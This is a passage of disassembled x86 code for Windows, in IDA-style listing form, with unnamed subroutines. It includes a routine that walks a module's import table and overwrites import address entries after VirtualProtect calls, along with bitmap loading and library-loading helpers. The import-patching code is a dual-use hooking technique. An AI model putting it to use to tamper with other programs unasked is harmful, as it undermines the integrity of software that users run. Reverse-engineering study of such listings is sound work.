loc_496101: ; CODE XREF: sub_4960D0+2A�j
mov eax, [ebp+arg_0]
mov [ebp+var_2C], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_30], edx
jmp short loc_49611E
; ---------------------------------------------------------------------------
loc_496115: ; CODE XREF: sub_4960D0:loc_496133�j
mov eax, [ebp+var_30]
mov ecx, [eax+4]
mov [ebp+var_30], ecx
loc_49611E: ; CODE XREF: sub_4960D0+43�j
cmp [ebp+var_30], 0
jz short loc_496135
mov edx, [ebp+var_30]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jnz short loc_496133
jmp loc_4963BC
; ---------------------------------------------------------------------------
loc_496133: ; CODE XREF: sub_4960D0+5C�j
jmp short loc_496115
; ---------------------------------------------------------------------------
loc_496135: ; CODE XREF: sub_4960D0+52�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_49C871
test eax, eax
jz short loc_49614A
jmp loc_4963BC
; ---------------------------------------------------------------------------
loc_49614A: ; CODE XREF: sub_4960D0+73�j
mov edx, ds:dword_4A2914
add edx, 1
mov ds:dword_4A2914, edx
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov ecx, ds:off_4A1BE8
mov [ebp+var_24], ecx
mov [ebp+var_4], 0
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
add eax, [edx+3Ch]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
cmp dword ptr [ecx], 4550h
jnz loc_496371
cmp ds:dword_4A2680, 1
jnz short loc_4961AA
cmp [ebp+arg_0], 80000000h
jbe short loc_4961AA
push 0
push 0
push 0
push 0
call ds:dword_4A2778 ; RaiseException
loc_4961AA: ; CODE XREF: sub_4960D0+C1�j
; sub_4960D0+CA�j
mov edx, [ebp+var_38]
mov eax, [ebp+var_34]
add eax, [edx+80h]
mov [ebp+var_20], eax
mov [ebp+var_4], 1
cmp ds:dword_4A2680, 1
jnz short loc_496247
mov [ebp+var_40], 0
jmp short loc_4961DB
; ---------------------------------------------------------------------------
loc_4961D2: ; CODE XREF: sub_4960D0:loc_496245�j
mov ecx, [ebp+var_40]
add ecx, 1
mov [ebp+var_40], ecx
loc_4961DB: ; CODE XREF: sub_4960D0+100�j
mov edx, [ebp+var_38]
xor eax, eax
mov ax, [edx+6]
cmp [ebp+var_40], eax
jnb short loc_496247
mov ecx, [ebp+var_38]
xor edx, edx
mov dx, [ecx+14h]
mov eax, [ebp+var_38]
lea ecx, [eax+edx+18h]
mov edx, [ebp+var_40]
imul edx, 28h
add ecx, edx
mov [ebp+var_44], ecx
mov eax, [ebp+var_44]
mov ecx, [ebp+var_34]
add ecx, [eax+0Ch]
cmp ecx, [ebp+var_20]
ja short loc_496245
mov edx, [ebp+var_44]
mov eax, [ebp+var_34]
add eax, [edx+0Ch]
mov ecx, [ebp+var_44]
add eax, [ecx+8]
cmp [ebp+var_20], eax
ja short loc_496245
mov edx, [ebp+var_44]
mov eax, [edx+24h]
and eax, 10000000h
test eax, eax
jz short loc_496243
push 0
push 0
push 0
push 0
call ds:dword_4A2778 ; RaiseException
loc_496243: ; CODE XREF: sub_4960D0+163�j
jmp short loc_496247
; ---------------------------------------------------------------------------
loc_496245: ; CODE XREF: sub_4960D0+140�j
; sub_4960D0+154�j
jmp short loc_4961D2
; ---------------------------------------------------------------------------
loc_496247: ; CODE XREF: sub_4960D0+F7�j
; sub_4960D0+117�j ...
mov [ebp+var_4], 0
jmp short loc_49626E
; ---------------------------------------------------------------------------
loc_496250: ; DATA XREF: _5:0049F470�o
mov ecx, [ebp+var_14]
mov edx, [ecx]
mov eax, [edx]
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_496264: ; DATA XREF: _5:0049F474�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_49626E: ; CODE XREF: sub_4960D0+17E�j
mov ecx, [ebp+var_38]
mov eax, [ecx+84h]
xor edx, edx
mov ecx, 14h
div ecx
mov [ebp+var_1C], eax
mov [ebp+var_3C], 0
jmp short loc_496295
; ---------------------------------------------------------------------------
loc_49628C: ; CODE XREF: sub_4960D0:loc_49636C�j
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_496295: ; CODE XREF: sub_4960D0+1BA�j
mov eax, [ebp+var_3C]
cmp eax, [ebp+var_1C]
jnb loc_496371
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
mov eax, [ebp+var_34]
add eax, [edx+ecx+0Ch]
mov [ebp+var_50], eax
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
cmp dword ptr [edx+ecx+0Ch], 0
jz short loc_4962DD
mov eax, [ebp+var_3C]
imul eax, 14h
mov ecx, [ebp+var_20]
mov edx, [ecx+eax+0Ch]
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+edx]
test ecx, ecx
jnz short loc_4962E2
loc_4962DD: ; CODE XREF: sub_4960D0+1F2�j
jmp loc_496371
; ---------------------------------------------------------------------------
loc_4962E2: ; CODE XREF: sub_4960D0+20B�j
mov edx, [ebp+var_3C]
imul edx, 14h
mov eax, [ebp+var_20]
mov ecx, [ebp+var_34]
add ecx, [eax+edx+10h]
mov [ebp+var_48], ecx
mov edx, [ebp+var_50]
push edx
call sub_49BF8C
mov [ebp+var_4C], eax
mov eax, [ebp+var_50]
mov ds:off_4A1BE8, eax
cmp [ebp+var_4C], 0
jz short loc_496323
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_4C]
push eax
call sub_4960D0
add esp, 0Ch
loc_496323: ; CODE XREF: sub_4960D0+23D�j
push 0
call ds:dword_4A2718 ; GetModuleHandleA
cmp eax, [ebp+arg_0]
jz short loc_49636C
mov ecx, [ebp+var_4C]
push ecx
mov ecx, ds:dword_4A70D8
call sub_49C871
test eax, eax
jz short loc_49636C
jmp short loc_49634E
; ---------------------------------------------------------------------------
loc_496345: ; CODE XREF: sub_4960D0+29A�j
mov edx, [ebp+var_48]
add edx, 4
mov [ebp+var_48], edx
loc_49634E: ; CODE XREF: sub_4960D0+273�j
mov eax, [ebp+var_48]
cmp dword ptr [eax], 0
jz short loc_49636C
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_48]
push eax
call sub_4963D0
add esp, 0Ch
jmp short loc_496345
; ---------------------------------------------------------------------------
loc_49636C: ; CODE XREF: sub_4960D0+25E�j
; sub_4960D0+271�j ...
jmp loc_49628C
; ---------------------------------------------------------------------------
loc_496371: ; CODE XREF: sub_4960D0+B4�j
; sub_4960D0+1CB�j ...
push 1
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_49C98E
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_4963A5
; ---------------------------------------------------------------------------
mov edx, [ebp+var_14]
mov eax, [edx]
mov ecx, [eax]
mov [ebp+var_54], ecx
mov eax, [ebp+var_54]
neg eax
sbb eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 0FFFFFFFFh
loc_4963A5: ; CODE XREF: sub_4960D0+2B6�j
mov eax, [ebp+var_24]
mov ds:off_4A1BE8, eax
mov ecx, ds:dword_4A2914
sub ecx, 1
mov ds:dword_4A2914, ecx
loc_4963BC: ; CODE XREF: sub_4960D0+2C�j
; sub_4960D0+5E�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4960D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4963D0 proc near ; CODE XREF: sub_495AB0+282�p
; sub_4960D0+292�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp ds:dword_4A70D4, 0
jnz short loc_4963F0
mov ecx, 0EF00000Ah
call sub_499342
loc_4963F0: ; CODE XREF: sub_4963D0+14�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, ds:dword_4A70D4
call sub_49C871
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_49644F
lea edx, [ebp+var_10]
push edx
push 4
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_4A27AC ; VirtualProtect
test eax, eax
jnz short loc_49642A
mov ecx, 0EF00000Bh
call sub_499342
loc_49642A: ; CODE XREF: sub_4963D0+4E�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ecx], eax
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_10]
push edx
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_4A27AC ; VirtualProtect
mov [ebp+var_4], 1
loc_49644F: ; CODE XREF: sub_4963D0+38�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4963D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496456 proc near ; CODE XREF: sub_48D3F3+23�p
; sub_490036+A5�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_1E = dword ptr -1Eh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F478
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 6Ch
push ebx
push esi
push edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_4], 0
and [ebp+var_3C], 0
lea eax, [ebp+var_34]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push 0Eh
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call sub_492177
test eax, eax
jz short loc_4964B7
lea eax, [ebp+var_44]
push eax
push [ebp+arg_0]
call sub_491672
test eax, eax
jnz short loc_4964D0
loc_4964B7: ; CODE XREF: sub_496456+4F�j
push 0FFFFFFFFh
and [ebp+var_64], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_4964D0: ; CODE XREF: sub_496456+5F�j
movzx eax, [ebp+var_28]
cmp eax, 4D42h
jnz short loc_496534
mov eax, [ebp+var_26]
cmp eax, [ebp+var_44]
ja short loc_496534
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
call sub_49935A
pop ecx
mov [ebp+var_5C], eax
mov eax, [ebp+var_5C]
mov [ebp+var_30], eax
lea eax, [ebp+var_48]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
push [ebp+var_30]
push [ebp+arg_0]
call sub_492177
test eax, eax
jnz short loc_496532
push 0FFFFFFFFh
and [ebp+var_68], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_496532: ; CODE XREF: sub_496456+C1�j
jmp short loc_49654D
; ---------------------------------------------------------------------------
loc_496534: ; CODE XREF: sub_496456+83�j
; sub_496456+8B�j
push 0FFFFFFFFh
and [ebp+var_6C], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_6C]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_49654D: ; CODE XREF: sub_496456:loc_496532�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_38], eax
mov eax, [ebp+var_30]
cmp dword ptr [eax+10h], 0
jz short loc_496577
push 0FFFFFFFFh
and [ebp+var_70], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_70]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_496577: ; CODE XREF: sub_496456+106�j
push 0
call ds:dword_4A27E0 ; CreateCompatibleDC
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4965A1
push 0FFFFFFFFh
and [ebp+var_74], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_74]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_4965A1: ; CODE XREF: sub_496456+130�j
mov eax, [ebp+var_1E]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-0Eh]
mov [ebp+var_40], eax
and [ebp+var_4C], 0
and [ebp+var_54], 0
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+0Eh]
mov [ebp+var_78], eax
cmp [ebp+var_78], 8
jz short loc_4965F5
cmp [ebp+var_78], 10h
jz short loc_4965EC
cmp [ebp+var_78], 18h
jz short loc_4965E3
cmp [ebp+var_78], 20h
jz short loc_4965DA
jmp short loc_4965FE
; ---------------------------------------------------------------------------
loc_4965DA: ; CODE XREF: sub_496456+180�j
mov [ebp+var_4C], 4
jmp short loc_496617
; ---------------------------------------------------------------------------
loc_4965E3: ; CODE XREF: sub_496456+17A�j
mov [ebp+var_4C], 3
jmp short loc_496617
; ---------------------------------------------------------------------------
loc_4965EC: ; CODE XREF: sub_496456+174�j
mov [ebp+var_4C], 2
jmp short loc_496617
; ---------------------------------------------------------------------------
loc_4965F5: ; CODE XREF: sub_496456+16E�j
mov [ebp+var_4C], 1
jmp short loc_496617
; ---------------------------------------------------------------------------
loc_4965FE: ; CODE XREF: sub_496456+182�j
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_496617: ; CODE XREF: sub_496456+18B�j
; sub_496456+194�j ...
push 0
push 0
lea eax, [ebp+var_58]
push eax
push 0
push [ebp+var_30]
push [ebp+var_2C]
call ds:dword_4A27E4 ; CreateDIBSection
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_49664F
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_4966DC
; ---------------------------------------------------------------------------
loc_49664F: ; CODE XREF: sub_496456+1DE�j
mov eax, [ebp+var_30]
mov eax, [eax+4]
imul eax, [ebp+var_4C]
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
test edx, edx
jz short loc_49667F
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
push 4
pop eax
sub eax, edx
mov ecx, [ebp+var_50]
add ecx, eax
mov [ebp+var_50], ecx
loc_49667F: ; CODE XREF: sub_496456+211�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_50]
imul ecx, [eax+8]
mov esi, [ebp+var_40]
mov edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0FFFFFFFFh
mov eax, [ebp+var_54]
mov [ebp+var_84], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp short loc_4966DC
; ---------------------------------------------------------------------------
loc_4966BB: ; DATA XREF: _5:0049F480�o
cmp [ebp+var_2C], 0
jz short loc_4966CA
push [ebp+var_2C]
call ds:dword_4A27E8 ; DeleteDC
loc_4966CA: ; CODE XREF: sub_496456+269�j
mov eax, [ebp+var_30]
mov [ebp+var_60], eax
push [ebp+var_60]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4966DC: ; CODE XREF: sub_496456+75�j
; sub_496456+D7�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_496456 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4966EB proc near ; CODE XREF: sub_4971E1+969�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push 0
push [ebp+arg_0]
call sub_49A2CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_49670F
; ---------------------------------------------------------------------------
loc_496708: ; CODE XREF: sub_4966EB+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_49670F: ; CODE XREF: sub_4966EB+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_49672D
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_48D86E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_496708
; ---------------------------------------------------------------------------
loc_49672D: ; CODE XREF: sub_4966EB+2C�j
push 0Ch
call sub_49935A
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_8]
mov [eax+8], ecx
mov eax, [ebp+var_C]
leave
retn
sub_4966EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49675D proc near ; CODE XREF: sub_495AB0+9F�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push 0
push [ebp+arg_4]
call sub_49A2CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_496781
; ---------------------------------------------------------------------------
loc_49677A: ; CODE XREF: sub_49675D+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_496781: ; CODE XREF: sub_49675D+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_49679F
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_48D86E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_49677A
; ---------------------------------------------------------------------------
loc_49679F: ; CODE XREF: sub_49675D+2C�j
; sub_49675D:loc_496818�j
cmp [ebp+arg_0], 0
jz short loc_49681A
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_C]
mov eax, [eax]
mov [ebp+var_14], eax
loc_4967C2: ; CODE XREF: sub_49675D+97�j
mov eax, [ebp+var_14]
mov al, [eax]
mov [ebp+var_15], al
mov ecx, [ebp+var_10]
cmp al, [ecx]
jnz short loc_4967FC
cmp [ebp+var_15], 0
jz short loc_4967F6
mov eax, [ebp+var_14]
mov al, [eax+1]
mov [ebp+var_16], al
mov ecx, [ebp+var_10]
cmp al, [ecx+1]
jnz short loc_4967FC
add [ebp+var_14], 2
add [ebp+var_10], 2
cmp [ebp+var_16], 0
jnz short loc_4967C2
loc_4967F6: ; CODE XREF: sub_49675D+78�j
and [ebp+var_1C], 0
jmp short loc_496804
; ---------------------------------------------------------------------------
loc_4967FC: ; CODE XREF: sub_49675D+72�j
; sub_49675D+89�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
loc_496804: ; CODE XREF: sub_49675D+9D�j
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_496818
mov eax, [ebp+var_C]
mov eax, [eax+4]
jmp short locret_49681C
; ---------------------------------------------------------------------------
loc_496818: ; CODE XREF: sub_49675D+B1�j
jmp short loc_49679F
; ---------------------------------------------------------------------------
loc_49681A: ; CODE XREF: sub_49675D+46�j
xor eax, eax
locret_49681C: ; CODE XREF: sub_49675D+B9�j
leave
retn
sub_49675D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49681E proc near ; CODE XREF: sub_4968CF+86�p
; sub_4971E1+D8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
movzx eax, ds:byte_4A2694
test eax, eax
jnz short loc_49687C
push offset dword_4A1C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_492AE2
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_496863
push offset dword_4A1C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_4929D2
mov [ebp+var_8], eax
loc_496863: ; CODE XREF: sub_49681E+30�j
cmp [ebp+var_8], 0
jnz short loc_49687C
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
push [ebp+var_C]
call sub_4993DD
pop ecx
and [ebp+var_4], 0
loc_49687C: ; CODE XREF: sub_49681E+17�j
; sub_49681E+49�j
cmp [ebp+arg_4], 0
jz short loc_49688C
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
jmp short loc_49689B
; ---------------------------------------------------------------------------
loc_49688C: ; CODE XREF: sub_49681E+62�j
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4993DD
pop ecx
loc_49689B: ; CODE XREF: sub_49681E+6C�j
mov eax, [ebp+var_8]
leave
retn
sub_49681E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4968A0 proc near ; CODE XREF: sub_496BD7+41�p
; sub_496BD7+37C�p ...
push ebp
mov ebp, esp
cmp ds:dword_4A295C, 0
jnz short loc_4968C2
push offset aKernel32_dll ; "kernel32.dll"
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
call sub_49AC22
pop ecx
pop ecx
mov ds:dword_4A295C, eax
loc_4968C2: ; CODE XREF: sub_4968A0+A�j
call ds:dword_4A295C
xor eax, 0CABEFA10h
pop ebp
retn
sub_4968A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4968CF proc near ; CODE XREF: sub_496AD2+C�p
; sub_49BF8C+2B�p
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 34h
mov [ebp+var_34], dl
mov [ebp+var_30], ecx
push offset sub_49CB0D
push ds:dword_4A27C0
push [ebp+var_30]
mov ecx, ds:dword_4A2954
call sub_49C891
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_49694E
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_496946
push 400h
call sub_49935A
pop ecx
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
push 400h
push [ebp+var_10]
push [ebp+var_C]
call ds:dword_4A2714 ; GetModuleFileNameA
test eax, eax
jz short loc_496937
push [ebp+var_10]
call ds:dword_4A275C ; LoadLibraryA
loc_496937: ; CODE XREF: sub_4968CF+5D�j
mov eax, [ebp+var_10]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_4993DD
pop ecx
loc_496946: ; CODE XREF: sub_4968CF+34�j
mov eax, [ebp+var_C]
jmp locret_496A3F
; ---------------------------------------------------------------------------
loc_49694E: ; CODE XREF: sub_4968CF+2C�j
push 0
push 0
push [ebp+var_30]
call sub_49681E
add esp, 0Ch
mov [ebp+var_8], eax
and [ebp+var_4], 0
cmp [ebp+var_8], 0
jz short loc_4969B3
push 0
push 0
push [ebp+var_8]
call sub_499892
add esp, 0Ch
mov [ebp+var_14], eax
push [ebp+var_14]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_49699F
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_49699F
push [ebp+var_14]
call ds:dword_4A275C ; LoadLibraryA
loc_49699F: ; CODE XREF: sub_4968CF+BD�j
; sub_4968CF+C5�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4993DD
pop ecx
jmp loc_496A3C
; ---------------------------------------------------------------------------
loc_4969B3: ; CODE XREF: sub_4968CF+99�j
push [ebp+var_30]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_496A3C
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_496A3C
push 400h
call sub_49935A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_18], eax
push 400h
push [ebp+var_18]
push [ebp+var_4]
call ds:dword_4A2714 ; GetModuleFileNameA
test eax, eax
jz short loc_4969FF
push [ebp+var_18]
call ds:dword_4A275C ; LoadLibraryA
loc_4969FF: ; CODE XREF: sub_4968CF+125�j
mov eax, [ebp+var_18]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_4993DD
pop ecx
push [ebp+var_30]
push [ebp+var_4]
call sub_496070
test eax, eax
jnz short loc_496A3C
call ds:dword_4A2710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_496A2F
push 7Eh
call ds:dword_4A278C ; RtlRestoreLastWin32Error
loc_496A2F: ; CODE XREF: sub_4968CF+156�j
push [ebp+var_4]
call ds:dword_4A26E0 ; FreeLibrary
and [ebp+var_4], 0
loc_496A3C: ; CODE XREF: sub_4968CF+DF�j
; sub_4968CF+F4�j ...
mov eax, [ebp+var_4]
locret_496A3F: ; CODE XREF: sub_4968CF+7A�j
leave
retn
sub_4968CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496A41 proc near ; CODE XREF: sub_49C076+4E�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00496AC3 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F488
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_28], ecx
push 105h
call sub_49935A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
stosb
and [ebp+var_4], 0
push 104h
push [ebp+var_1C]
push [ebp+var_28]
call ds:dword_4A2714 ; GetModuleFileNameA
push [ebp+var_1C]
push [ebp+var_28]
call sub_496070
or [ebp+var_4], 0FFFFFFFFh
call sub_496AB3
jmp short loc_496AC3
sub_496A41 endp
; =============== S U B R O U T I N E =======================================
sub_496AB3 proc near ; CODE XREF: sub_496A41+6B�p
; DATA XREF: _5:0049F490�o
mov eax, [ebp-1Ch]
mov [ebp-24h], eax
push dword ptr [ebp-24h]
call sub_4993DD
pop ecx
retn
sub_496AB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_496A41
loc_496AC3: ; CODE XREF: sub_496A41+70�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_496A41
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496AD2 proc near ; CODE XREF: sub_49BE2D+19�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov dl, 1
mov ecx, [ebp+var_4]
call sub_4968CF
leave
retn
sub_496AD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496AE5 proc near ; CODE XREF: sub_4971E1+5DB�p
; sub_4971E1+60F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_496B05
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
sub eax, [ebp+var_4]
jmp short locret_496B08
; ---------------------------------------------------------------------------
loc_496B05: ; CODE XREF: sub_496AE5+13�j
